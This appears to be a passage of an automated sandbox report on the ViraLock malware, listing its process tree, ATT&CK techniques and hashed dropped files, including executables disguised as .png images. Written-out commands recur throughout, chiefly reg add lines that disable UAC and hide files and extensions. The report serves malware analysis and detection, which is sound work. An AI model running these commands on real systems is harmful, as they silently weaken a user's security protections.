C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eoMskcgo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
25⤵
PID:5272

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
26⤵
PID:6044

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
23⤵
PID:5672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
23⤵
PID:5244

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
23⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EeMscQkk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
23⤵
PID:5840

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
24⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
21⤵
PID:2292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
21⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
21⤵
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LmIAAIgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
21⤵
PID:5804

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
22⤵
PID:5572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
19⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
19⤵
PID:3100

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
19⤵
- Modifies registry key
PID:5668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcoMogYg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
19⤵
PID:5192

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
20⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
17⤵
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
17⤵
- Modifies registry key
PID:5440

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
17⤵
PID:948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIQYAEQw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
17⤵
PID:4028

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
18⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
15⤵
PID:5400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
15⤵
PID:5916

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
15⤵
PID:6012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UKQoUgUY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
15⤵
PID:2620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
16⤵
PID:5824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
13⤵
PID:5576

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
13⤵
PID:5984

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
13⤵
PID:5516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uUYAAQQc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
13⤵
PID:5924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
14⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
11⤵
PID:5240

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
11⤵
- Modifies registry key
PID:5268

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
11⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rgYEcoAk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
11⤵
PID:6104

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
12⤵
PID:5896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
9⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
9⤵
- Modifies registry key
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
9⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NAowgYoU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
9⤵
PID:5324

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
10⤵
PID:5384

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
7⤵
PID:5292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
7⤵
PID:5944

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
7⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tcAsYUkM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
7⤵
PID:5948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
8⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
5⤵
PID:5796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
5⤵
PID:5804

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
5⤵
PID:5812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gWEMoEAA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
5⤵
PID:5828

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
6⤵
PID:5472

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
3⤵
- Modifies registry key
PID:3180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
3⤵
PID:1508

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
3⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rMcYMQME.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
3⤵
PID:748

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
4⤵
PID:5576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3768

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3924

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4012

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3668

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4412

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:3512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3028

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4828

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2020

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:4924

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4056

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1108 -ip 1108
1⤵
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5100 -ip 5100
1⤵
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 412 -ip 412
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4340 -ip 4340
1⤵
PID:1004

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Modifies WinLogon for persistence
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3676

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9783F1EE344A7CD5BAD23837CD71CA2A
2⤵
- Loads dropped DLL
- Blocklisted process makes network request
PID:4844

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9950111C02931E5A99CD0858E63512E9 E Global\MSI0000
2⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1344

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2468

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5d27e1.rbs
Filesize
99KB

MD5
85c9c791e60962e161a28bdc62a65f7d

SHA1
a48c036c31dd8e063fcd7c428983ec3c0d068a65

SHA256
783426c9867c0a00a600f6d49e7af87977237ea1c31a447898b861936b468bd2

SHA512
5c0afa0e4f8e54ce51231c64d755c847a980aec3a01f18ade28569a7055fcbd0f11a628751b9d9cfc7026b2c7a94da79677f77dc34b27938548a2b1fc3946629

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe
Filesize
320KB

MD5
e49ea3071a551273b010366ade85d823

SHA1
dd95a494a73e3a8cc9dc8376ba7592d5bd0dc2ab

SHA256
71e9a1abceaea9df19e5edb658feb703ac5546d29002672d292cb43fe294ea41

SHA512
4fbb857186cdb18a4c04047a405acaaeb8678fdc87e05050807766dd55ffbca23d2f4760781606202eea26325542655b7547907299b158d038855d983a6762e3

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.exe
Filesize
223KB

MD5
b3c421baffd111236d3451e2a5633e6f

SHA1
58637848b551256b7876355131a659b87592edbc

SHA256
172428b46b1f7637bcc7a64956b105b808a3f27e57349a0b4b32bf7c247c4b64

SHA512
07e067a5fe9f6c5d3adf97e6d59948f11c255386656c309b6a1911092f918a73a55cb6bc2e08424361ea1c02fb5b06456bdd9718a2167b237cbd7bc695ba1aab

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.exe
Filesize
305KB

MD5
0d8a2e44b0ef8568eb64a7801c896ffc

SHA1
86c2cb3231422cbcfed9bf32690cb8dc6053f528

SHA256
da335fc6ea8859805f63e18c8821fd888729fb920e3aa969fe9aa51305f406f9

SHA512
2a3fc8bc79720ca5b50b939949dd86e1e6b3a42bcd9092e190cd3a4fd7efb91aedc0ef335569cec72e4899ad82f3d82535ae9c4f9bf9e8a23d1024404b839c6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png.exe
Filesize
198KB

MD5
3e457070eb7ebd0d65ad5fcd5be775b3

SHA1
b5e1acadc6968a46d5a714efcd91e35231fd4be7

SHA256
a5c243d423442a6fdcf5824842fd4bf8d5743b26e664ec82d0bda2d26a314332

SHA512
9fff9183d82bd013773ee82d73f126772166722e42199577ee0bc8c8d178314b29d577d0c7b2e0f6c37520f7550bb03ddbcedd1c470949c1f0f0e0c340d5c297

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.exe
Filesize
206KB

MD5
fbfc1e37fda2453857d1bb11d38af20e

SHA1
dcb5e8c773ffc68d163419da3d892f2c19c18aae

SHA256
ba1f3276ed0f8c5a9a1fa2a416fb02ad2ab481172e13b0e8c81f5c3c00c77a85

SHA512
83c4e3eb7a1f5275244188133feca114f81e2af018472dbb073665148ed12bda3e8a390b512a7c731118989f903e832c6488284149a3b578b5f1f4872a57fdfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8b2290ca03b4ca5fe52d82550c7e7d69

SHA1
20583a7851a906444204ce8ba4fa51153e6cd494

SHA256
f9ff4871fc5317299de907489d466e630be63d698c8f7cb77cc81faddbecc6d2

SHA512
704ec8122cc1c263dff67ddbb5c20ee0db8a438674d716bc3be5b266ee5629a219b0049d721f9eb2dd8f2d8fda0163659eaa4d3e1f0a6e9072a8ffb92bb2b25d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
919c29d42fb6034fee2f5de14d573c63

SHA1
24a2e1042347b3853344157239bde3ed699047a8

SHA256
17cd6de97a0c020cb4935739cfef4ec4e074e8d127ac4c531b6dc496580c8141

SHA512
bb7eadd087bbcec8b1b8a49b102b454333f2f9708d36b6ffc3c82fdc52e46873398d967238c3bfe9ac6caef45b017a5fe3938ebf5f3053e4ef9be7b2752b563d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\11681c16-f859-4f42-9895-f2f022b491ff.tmp
Filesize
6KB

MD5
d923a2343714940a8a49fd1df6b01ba5

SHA1
505d68670cf96eba1239a774c7203f164b9466b6

SHA256
5923af7fd0c550b0e1a9d60d55696f1d65e429272797a985d530ff6dbc0de55e

SHA512
a7c11bf37c896694d4caf5937facf0db37dfde553d6b5c9427ec80cdd49cbcb2099b314a532ab1a302c69146320c24438946f6781a90feab5418f2c7d85892d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
522daf72d79f371f3c5f8dc9be61e3bc

SHA1
2a0e693f5f432c3d3a61eeef11cd1b92919484e3

SHA256
92f1bd6af8b3e66ddbb102eb38cd303c42022455673c0625afa04ea81ff83f49

SHA512
fd6b9534c9e57888bc84ad77e5acde2ae4efe936ee0d173de621be58c8938fccb9b5936c3f03c3631ca834b2d8c710f1a3cd3a934f09b1c790fc8d9cb39a66fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
579B

MD5
2ebbd61422b78463e73114c90d111185

SHA1
96a2a4824b034c487ccfcc08f3d7defa75601565

SHA256
164f96175f640e1c88954414f0d6bd4b866e8bc4004221585211df95aaeacaab

SHA512
a707e87fa44ddc0f804778e849698b4b9b1a110342a9eb8abcc1a9178019d6424077d6293940adf1b3db80872e42fb70347fb927e7a6cadb2490381fb2f1b926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
496B

MD5
68796d38dbdfcc782f0286de3168bbcf

SHA1
ada79c4e910e246efc34ee3db45f22835f79efaa

SHA256
df741a75f0d8edbecd876c56ace12df986d412827cf351c6cf1ce847470dcc2f

SHA512
748834486f28756567c775eb84edafe82c2651c479765dfa896a6a7d611180355bada35d2d8881ec3484caea420fca176c2a510e3eae10babdb546a6b2f99c6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
93b5ad1edd8e6775ba67128d48c18a49

SHA1
850531ddc1f4845d289493c45e8a7b2b0e131f07

SHA256
029245685aaa51702fdc7dbc013b174b8f48fcd61c647444bb162ce41eed3d0b

SHA512
0d088b3bb5b934e23389d0ec501c9e9721a55a91fe9e3afdbdd1ad70869cac69b1f2c16e821d7909a18ee78fd28b07ce710a8e795d599421b7ae86fbeb5cc4a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
b7926f0e781cd7d7a782d33276ba7db0

SHA1
bc0d108b7311bc9dcb9ffe5a628d44a9032863b0

SHA256
9cb187e1ce2e95e06c4c75bea9bc09158a2222efa9725ef9338c5608f323c641

SHA512
a23fdf39c55517fbca726be403199c8aec71a5165530a4b1faa80871a3f814fcc0441605c584ce91a02ab1183c8ab4f43126bbaff77105c8b870492be5b6c0e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
56df0f917a929de4b3e9035ab9d9d26c

SHA1
6f71417df90b5f5b9e2ded1c0df1e05d84e86836

SHA256
24489f1ac89a791cb29bbe8b68ffebf95f070dfbf6dff5b6abd7973a761eea4e

SHA512
921c78b09427d51243a99f9a0a3d42c0aab3d624de02fa52f91f91f0e6787c167e4ff4da5377ea0763a887b835ad6bb00405a9b5249176a882abf332c26cfb17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
e1d08077677e30bf5205977b678e0355

SHA1
2500901b8d2eadf87cb6d7573140f618cae019cf

SHA256
b62cc76a0b6e9ce903abe8df3e245081c8358808a7ceb94ae928552ce6cc8028

SHA512
2ab0b6e6931da3cab627f685efeaabe12447fb2cccf9e251217fef68663a94766d56a5333b89caac7b4009ae67421e6f23547be8fe1b8f9cd0fa694e165e6874

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
3c2506ec7bcfc723d0cb0f975e3ea5f0

SHA1
0ff47d535725db75a3ef3beb58ced1a94b7e7bc4

SHA256
e29d6c3c1b0da8aaad6d919d0225da3b3dde236ea1a92d1007acc8a25af011a5

SHA512
fff474adc82df6f001499786510315a595d86e85b3ee487dfc555efe6ad18634620594ec30412a25a6b056810cbc393642d810d9a73a1bf738be81828dbdb1d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
4c3a4bee0831802dd503ac110e5a4ab4

SHA1
6e404239cdb4bf6e186187596c706e2a3090d5f7

SHA256
598ee2716017995fff7564d6b37886a885fb0eeca4def80eac75319c19912365

SHA512
34ecafb6254083b2ec1d70e1984bb0219f35a7ab231710a6db16abac1f8a644f39bbf80789ae1be1b79605ac7cc7f6dd732f528772ae1dc3a8f8f41630aef88a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e83116ef61f9438067e7d8c31c92bd0f

SHA1
795fd772a8da097e1f8c10c2d066c200cba57b2d

SHA256
29883003d3b9818030fe41c67815167d9dec90b337bc02337bbf6426b11586eb

SHA512
f84dc7372a496ec7d57bdf5256715c281c2f72956b38ea12bb6e75a140a6f2d6a2e2e5a817f47dd5aa609458969ca0d8c6bb551633f044325c0edaf56ff717e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
362f999aeef3140307790aab6ade86e1

SHA1
aaca0b878b69176e2f4fb7f1ec71391b05aae9e3

SHA256
e0db44ae3715b43b4082ee755062ce8b3427154499f500b66759437249c1fa23

SHA512
202868b804957388d24dfe5af2fd93c0fc09c13fec1917f8c559af2026d606e7b577cecba984cf3f0f389bce27a78c2ce349068f31b76c6cb891245a91443146

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
851b4f7e37e90f9f8c91a57dd79929c1

SHA1
e9db57537a19bfb1277a06e81b6e46a181a5c8f1

SHA256
9d7ac5f587ddac4121618069551964f922c87b93e2845c9057e14dd3408db8ab

SHA512
92e11827b83ea9763ca6f110fa09442b9893888f893f5db3ae645f1d7d1b0dc89fe390f8a54b1522603f0bd14cad5f8766f7af7c3c26cd2434094d0e267f362d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
b0c85822545ed69f606458c9343613b2

SHA1
906e66acf24eb4178fd6d0340c8d308c25736e6a

SHA256
0948d54b84c3e197f4ec6641d34abb133cebab5d6f72f4c46f2db64384340aff

SHA512
405714a3b9bbd39af5ceafa7a7d298bbc65d8f34fdf7e527ca44b11a79e6e67e403e1b93187da8a369a5b0beb6ffda19751028b5ee27875bb89288dcc722b697

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
d5ea8b1461e826de75064411745fcd32

SHA1
de27ec1367960e08c93e76dacec7b2affbaa9d9d

SHA256
eb659d5d7893d86479a2b201ea729f90bcf11343436ed1b47037607e838f2af0

SHA512
172892a6fafb23d22902b81ccaf83b673b2973f8ec6d88fcde42fdf391275d7e9bf12343cc068696a4297c605c43148b5d7634193249d9937e929b9b5c52b48e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
bd03c108b14e11e8c0a9979f38c77002

SHA1
49516355fcce782b3bae471320afc22b3e4437b5

SHA256
415706e032573b6f2b1cc7da908efc0f36b28727194a89418ccbb2062624ec03

SHA512
feedb1da2804bf1439195821f91c9169c4d2681d9e972a57e88c53f634f88b2c3d8279d7834de267167611682e8ed8cdb9fa8fabd3abaad34c41046ecc81dde2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b4f74.TMP
Filesize
874B

MD5
a51ed375e5e7365b64947647a7cbb498

SHA1
7275019de9569bfce80248b4c008a66c04a68235

SHA256
f90b8f477ef005429a37c2946738297ea3c13006fd036b75590e0d0e4a927527

SHA512
f0602ed59275de1241391bca3250ac5e6acee365378212f6510c7d908dcf5069ef5b5f6936084dd022224487b765c8a3233b91031c18230e61c7c0a5e4485ffa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b7be0cd1-cb19-4c35-8a8c-e22309260d9b.tmp
Filesize
1KB

MD5
46c435c461b54fb9f6b1d635d80b9441

SHA1
19e254fbae79fbefa130e6d7650db3fa20260058

SHA256
2750c1d632cb64e2c176cdf7f4ba32efc47d7ef94d5ac14399c26c3208b2aa09

SHA512
3df157f4c48d7ef7201f7f9d7e436e1c911ed941abf59eb3c8cdc0c692e6d7f1835aef81a194f5aedd90a4fa15f86b02c244aba0b834944368ce818ee7a68fe3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
e94a2867f42c8bb4f8dae28d28175bd8

SHA1
f1e967ed48b0b1937c6c4cdf3343bf9fffd04fb2

SHA256
d610c22d101452e99cb6ee706ae1502ecd359e8a43ed3e9cf51ae65f938915bc

